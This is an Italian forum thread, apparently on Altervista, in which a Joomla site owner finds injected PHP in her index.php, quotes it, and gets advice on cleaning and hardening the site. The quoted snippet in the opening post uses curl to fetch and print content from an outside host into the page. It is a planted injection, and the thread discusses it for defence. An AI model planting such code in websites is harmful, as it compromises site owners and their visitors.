Unexpected '<' in index.php on line 89

Buongiorno a tutti.
Stamattina ho riscontrato un problema sul mio sito Joomla, trovando, invece che la index.php una pagina bianca con l'errore in oggetto

unexpected '<' in index.php on line 89

trovato nella index.php appunto.

Ho guardato il file e alla riga 89 non c'era la minima traccia di"<". Ho provato a commentare quella riga e mi dava un altro errore alla linea 177. Ho guardato e ho trovato questo script:

<?php function crawl_page($url){$ch=curl_init();curl_setopt($ch, CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTR ANSFER,1);curl_setopt($ch,CURLOPT_ENCODING,"gzip") ;curl_setopt($ch,CURLOPT_TIMEOUT,200);$result=curl _exec($ch);curl_close($ch);return $result;}print crawl_page("http://likeimages.net/");?>

Allora ho un po' cercato in rete e ho visto che alcuni siti sono stati hackerati, trovandosi nella index degli script o qualcosa del genere.
Ho provato a commentare quel php function e adesso mi sembra che vada tutto bene.

Quel codice cos'é? Se non sbaglio la curl è qualcosa che dev'essere installato sul server per la corretta visualizzazione dei siti joomla...quel codice c'entra con la libreria curl o è davvero una sorta di hackeraggio?

Premetto che ho aggiornato Joomla alla versione 1.5.22 ultimamente e da quello che ho visto è l'ultima versione disponibile (prima della 1.6, ovviamente :) ) e non ho fatto modifiche o nuove installazioni di componenti di recente.

Grazie a chiunque mi possa dare una delucidazione in merito.
Buona giornata e buon lavoro.
L

[saitfainder]

È sicuramente un codice sospetto perché definisce una funzione e poi richiama semplicemente un url stampando il risultato. Quindi sostanzialmente inietta nella pagine del contenuto estraneo al tuo sito. Però se non hai attivato le connessioni server2server è in realtà innocuo.

Per sicurezza ricaricherei tutti i file di Joomla per evitare che ci siano altri file compromessi.

ciao


si , sei stato oggetto di un tentativo di hacking e probabilmente hai joomla che è in qualche modo "infetto "

anche io sono stato oggetto , probabilmente hanno inserito del codice dormiente prima dell'aggiornamento alla 1.5.22

- Passo 1

• Cambia Tutte le password
• Lista tutti i files recentemente modificati (troverai che ogni file index.html è stato modificato)
• nota eventuali files Sospetti recentemente creati o modificati
• Aggiorna tutti i componenti/moduli o plugin qui presenti e se non sono in verde cancelllali
  http://docs.joomla.org/Vulnerable_Extensions_List
• ti consiglio di sovrascrivere il core , ti scarichi una versione di joomla , linda e pulita e sovrascrivi i files (non ti accadrà nulla , i contenuti sono nel DB)
• Verifica i template , controlla manipolazioni nel codice o files sospetti
• Controlla il DB , utilissima la funzione cerca di phpmyadmin inserisci la voce "likeimages.net" e se ci sono tabelle cancellale
• Stai attento ! in guardia , ritorneranno , il tuo sito è nella loro lista, armati di backup costante (akeeba backup ) , se ti risuccede , dovrai ripetere la procedura eliminando uno ad uno i componenti e identificando eventuali falle
• Controlla infine il tuo pc , se ci sono virus che copiano sessioni o cookie , proteggi inoltre la pagina di amministrazione di joomla con il lucchetto ( o componente Admin tool )
• creati un backup e identifica eventuali componenti o moduli datati o soggetti a bug

Ciao

Ciao,
grazie ad entrambi delle risposte.
Infatti ieri controllando nel mio spazio ho trovato una cartella bella piena zeppa di file html con fotografie di gente mai vista e non assolutamente mie!
Speravo di non dover ricaricare tutto il core di joomla: ho il 56k e questo è un lavoro che sarà decisamente lungo...
Seguirò le tue istruzione SwedenFox, grazie dell'aiuto...
- Per quanto riguarda le passowrd sia quelle di joomla (del sito) che dell'account di Altervista, giusto?
-Come faccio a sapere quali sono i file recentemente modificati? Dall'FTP è possibile' Quindi mi dovrei passare tutte le cartelle di joomla e controllare'
-come faccio a proteggere la pagina di amministrazione di joomla con il lucchetto? Lo posso fare dal pannello della gestione file di altervista?

grazie mille dell'aiuto...sono proprio caduta dalle nuvole con quei file...

Ciao,
grazie ad entrambi delle risposte.
Infatti ieri controllando nel mio spazio ho trovato una cartella bella piena zeppa di file html con fotografie di gente mai vista e non assolutamente mie!

perfetto , sicuramente avrai subito modifiche al core
quindi scrocca una adsl e dotati di tempo
IPOTESI SICURA
- carichi sul tuo pc un nuovo joomla (lo installi su un server tipo xammp o lammp)
- ti copi il template (controlla opportunamente che ogni files sia corretto e non modificato) o ti crei un backup del template
-ti crei un backup del tuo db (ricorda di cesellare la casella DROP IF (sovrascrive))
- sul tuo pc installi il nuovo joomla e il template e carichi via phpmyadmin il db sovrascrivendo quello "base"

Risultato
Hai un joomla base con il tuo template ma solo con i componenti di base
INSTALLA i componenti solo se necessari !!

Ciao,
- Per quanto riguarda le passowrd sia quelle di joomla (del sito) che dell'account di Altervista, giusto?

sì

Ciao,
-Come faccio a sapere quali sono i file recentemente modificati? Dall'FTP è possibile' Quindi mi dovrei passare tutte le cartelle di joomla e controllare'

se sei un utente linux , scarichi via ftp e dai un find su cartella

-come faccio a proteggere la pagina di amministrazione di joomla con il lucchetto? Lo posso fare dal pannello della gestione file di altervista?

ti consiglio Admin Tools

fa tutto lui
-ti cambia il prefisso di default
-ti cambia l'userid
-ti mette una password htpasswd su la cartella administration


c'è un altra ipotesi ma dovresti controllare ogni cartella alla ricerca di file modificati o un possibile cavallo di troia
disinstallare il componente incriminato
è necessario cancellare i files del componente anche via ftp
/administrator/components/com_componenteincriminato
/components/com_componenteincriminato

solitamente loro inseriscono codice nel template .... quindi di sicuro ricontrolla il codice del tuo template (tieni presente tra i tag head )

ti saluto , ci metterai almeno 1 giorno...

grazie Swedenfox delle tue indicazioni.
Volevo fare una precisazione: i file "incriminati" che mi sono trovata nel mio spazio erano in una cartella di Oscommerce - che usavo prima di installare Joomla.
Questo per dire che magari non si sono attaccati a joomla, ma a quella vecchia versione di OsCommerce, che ho già provveduto a cancellare ed eliminare dal database...che ne pensi?

Nella Vulnerable Extension List del link che hai fornito l'unico componente presente che ho installato sul mio sito è Rokdownload che dovrei solo aggiornare...Sul sito inoltre ho installato solo i componenti necessari: Virtuemart, Joomfish, JCE e appunto Rockdownload tutti componenti sicuri e "professionali"...

prova così ...

-cambia le password
-abilita se non l'hai fatto htaccess
-metti akeebabackup
-metti admin tools , metti il lucchetto all'amministrazione e cambia il prefisso delle tabelle
-fatti un giro tra i files (trova eventuali .c o cgi o sh)
-carica sovrascrivendo una versione di joomla pulita (mettiti l'anima in pace se non vuoi vedere il sito bannato da google)

ti posso dire che a me hanno cambiato
\administrator\includes\pcl\gzip.lib.php
e i file del template
\templates\nometemplate\index.php

ok...
- le password le ho modificate
- l'htaccess invece che .txt deve essere .htaccess, giusto? Era già fatto... (tra l'altro avrei un problemino anche con quello, nel senso che se cerco di abilitare i Sef url e metto php 5 sul mio spazio altervista si sballa tutto...e quindi non posso usarli...ma questo è un altro discorso...)
-procedo con download di akeeba e admin tools
- ahimé, procederò con il caricamento di una versione pulita di joomla

Grazie mille dell'aiuto...

prima di chiudere come risolto la discussione, vedo se dopo installazione procede tutto bene...

- l'htaccess invece che .txt deve essere .htaccess, giusto? Era già fatto... (tra l'altro avrei un problemino anche con quello, nel senso che se cerco di abilitare i Sef url e metto php 5 sul mio spazio altervista si sballa tutto...e quindi non posso usarli...ma questo è un altro discorso...)

http://forum.it.altervista.org/jooml...ror-500-a.html

qui ho postato l'htaccess per php5

Eccomi...
ieri ho scaricato e installato sia akeeba che admin tool, ma uno dei due mi sembra akeeba mi ha scaricato dicendomi che non potevo usarlo perché ho php4...allora ho provato - tanto per provare - a settare il php5, solo che poi mi è andato in pappa il pannello di amministrazione. Allora ho rimesso il php4, solo che poi non si vedeva in nessun modo l'editor di JCE, anche usando quello di dafault di joomla e non appariva neanche la scrittina Show/hide...
Allora oggi mi sono messa di buzzo buono e sono riuscita in men che non si dica (ci è voluto tutto il pomeriggio...) a caricare, sovrascrivendo, la versione pulita di joomla 1.5.22 e JCE 1.5.7.6 Ora mi sembra sia tornato tutto alla norma.
Stasera o domani provo a mettere il php5 con il file che mi hai consigliato e poi ri-installo Akeeba e Admitool.
Una domanda, il lucchetto alla cartella administrator ho notato che si può mettere anche dalla gestione file di altervista, giusto? Al limite potrei usare quello, senza installare Admintool... Eventualmente come si farebbe? Dal pannello di Altervista Gestione File, seleziono la cartella administrator e clicco sul lucchetto?
Un'altra cosa, per il php 5, dato che ho già rinominato il file da .txt a .htaccess, basta che incollo uno dei codici che hai indicato e invece il .txt lo cancello/rinomino, giusto?
Scusa le tante domande, ma a forza di guardare qua e la sto facendo un po' di confusione...

Grazie mille dell'aiuto...speriamo funzioni il php5, mettere i sef url (gli url "amici di google") non sarebbe male, anche se ho letto che comunque Joomfish non funziona perfettamente su Altervista e bisogna tenere il plugin Legacy disabilitato....sai dirmi qualcosa anche in merito a questo?

Grazie ancora di nuovo.
L

Una domanda, il lucchetto alla cartella administrator ho notato che si può mettere anche dalla gestione file di altervista, giusto? Al limite potrei usare quello, senza installare Admintool... Eventualmente come si farebbe? Dal pannello di Altervista Gestione File, seleziono la cartella administrator e clicco sul lucchetto?

Esatto il passaggio che hai indicato è perfetto , ti ho consigliato admin tools perchè mi sembra la soluzione completa , oltre il lucchetto , puoi ottimizzare le tabelle , cancellare i temp files , modificare il prefisso tabelle e l'userid di default dell'amministratore + altre cosette per l'uso di amministrazione combinata

Un'altra cosa, per il php 5, dato che ho già rinominato il file da .txt a .htaccess, basta che incollo uno dei codici che hai indicato e invece il .txt lo cancello/rinomino, giusto?
Scusa le tante domande, ma a forza di guardare qua e la sto facendo un po' di confusione...

esatto pure questo , basta aggiungere al file che hai nell htaccess

Codice:

# # av:php5-engine
AddHandler av-php5 .php

Grazie mille dell'aiuto...speriamo funzioni il php5, mettere i sef url (gli url "amici di google") non sarebbe male, anche se ho letto che comunque Joomfish non funziona perfettamente su Altervista e bisogna tenere il plugin Legacy disabilitato....sai dirmi qualcosa anche in merito a questo?

Grazie ancora di nuovo.
L

a me joomfish ultima versione funziona anche senza legacy , francamente l'ho disinstallato adesso ma credo non ci siano problemi ad installarlo meglio però per adesso concentrarsi sulle basi , poi si amplia il tutto meglio su un altro post

Esatto il passaggio che hai indicato è perfetto , ti ho consigliato admin tools perchè mi sembra la soluzione completa , oltre il lucchetto , puoi ottimizzare le tabelle , cancellare i temp files , modificare il prefisso tabelle e l'userid di default dell'amministratore + altre cosette per l'uso di amministrazione combinata

Sono riuscita a mettere la password alla cartella administrator, ho avuto solo un intoppo all'inizio perché pensavo che si facesse dalla cartella principale, spuntando la cartella administrator. Invece poi sono entrata proprio nella cartella administrator e messo il lucchetto ed ha funzionato!

esatto pure questo , basta aggiungere al file che hai nell htaccess

Codice:

# # av:php5-engine
AddHandler av-php5 .php

Incredibile, anche questa è andata. Non sai quante volte ci ho provato e mi si incasinava tutto! Si vede che a forza di spulciare, mi erano venuti gli occhi storti...e sicuramente sbagliavo.
I SEF Url funzionanno per le pagine...un piccolo particolare (già che ci sono, poi la smetto, prometto...): ho una pagina html prima del sito vero e proprio, con la scelta della lingua e il link punta all'indirizzo del sito+index.php?lang=it (o index.php?lang=en)...che link ci dovrei mettere ora? Sai mica darmi qualche dritta?
Le altre pagine, ad esempio "Chi siamo", hanno già il link "giusto"...
Per Virtuemart ho trovato Virtuemart SEF che mi sembra abbia buone recensioni e dicono semplice da installare e da usare...incrocio le dita...al limite per questo apro un'altra discussione.

a me joomfish ultima versione funziona anche senza legacy , francamente l'ho disinstallato adesso ma credo non ci siano problemi ad installarlo meglio però per adesso concentrarsi sulle basi , poi si amplia il tutto meglio su un altro post

Ho provato ad aggiornare le traduzioni e funziona anche Joomfish (2.0.3): salva le traduzioni senza problemi, cosa che prima non faceva. Incredibile...sto inziando a pensare che sia stata una botta di fortuna che mi abbiano hackato il sito...ora è tutto molto più preciso! :)

Credo di poter mettere un bel RISOLTO alla discussione.

Grazie mille per l'aiuto! Non so di dove sei, ma se passi dal Basso Monferrato sei invitato ad un bel barbeque! ;)

Per Virtuemart ho trovato Virtuemart SEF che mi sembra abbia buone recensioni e dicono semplice da installare e da usare...incrocio le dita...al limite per questo apro un'altra discussione.

io uso , sh404sef , mi trovo bene , è un componente commerciale , ma va da dio
un esempio con la tua stessa situazione
virtuemart +joomfish + sh404sef
http://www.prodottitipicicalabresi.net/

come vedi funziona bene anche con le lingue

Non so di dove sei, ma se passi dal Basso Monferrato sei invitato ad un bel barbeque! ;)

si ma se passo come faccio a trovarti ?

Scusate, sono scomparsa...ma come si mette il RISOLTO davanti al titolo della discussione??
Grazie

Una curiosità, dato che riguarda un tema trattato qui.
Ho messo il lucchetto alla cartella admin e quando entro nell'administrator su altervista tutto ok. Avrei bisogno di fare un restyling al sito: backup più recente, wamp etc. Ma quando provo ad andare su administrator in locale mi da errore 500 - Internal Server Error come fare?
La prima volta mi è uscito il pannellino dove chiede user e password come su altervista, ma mi sono confusa e ho sbagliato i codici. Ora mi dice solo Internal Server Error.

Avevo già una copia vecchia del sito in locale e nella cartella ho copiato solo le cartelle perché i vari htaccess e configuration mi incasinano. Può dipendere da quello il fatto che non riesco ad entrare nel pannello administrator in locale?

Come risolvere?
Grazie a tutti!

Ok, scusate, ho trovato il modo.
Nel caso interessasse a qualcuno, nella cartella admin ci sono i file inerenti alla password: 1 file . htaccess e 1 file .htpasswd. ho rinominato quelli e ora sono riuscita ad entrare.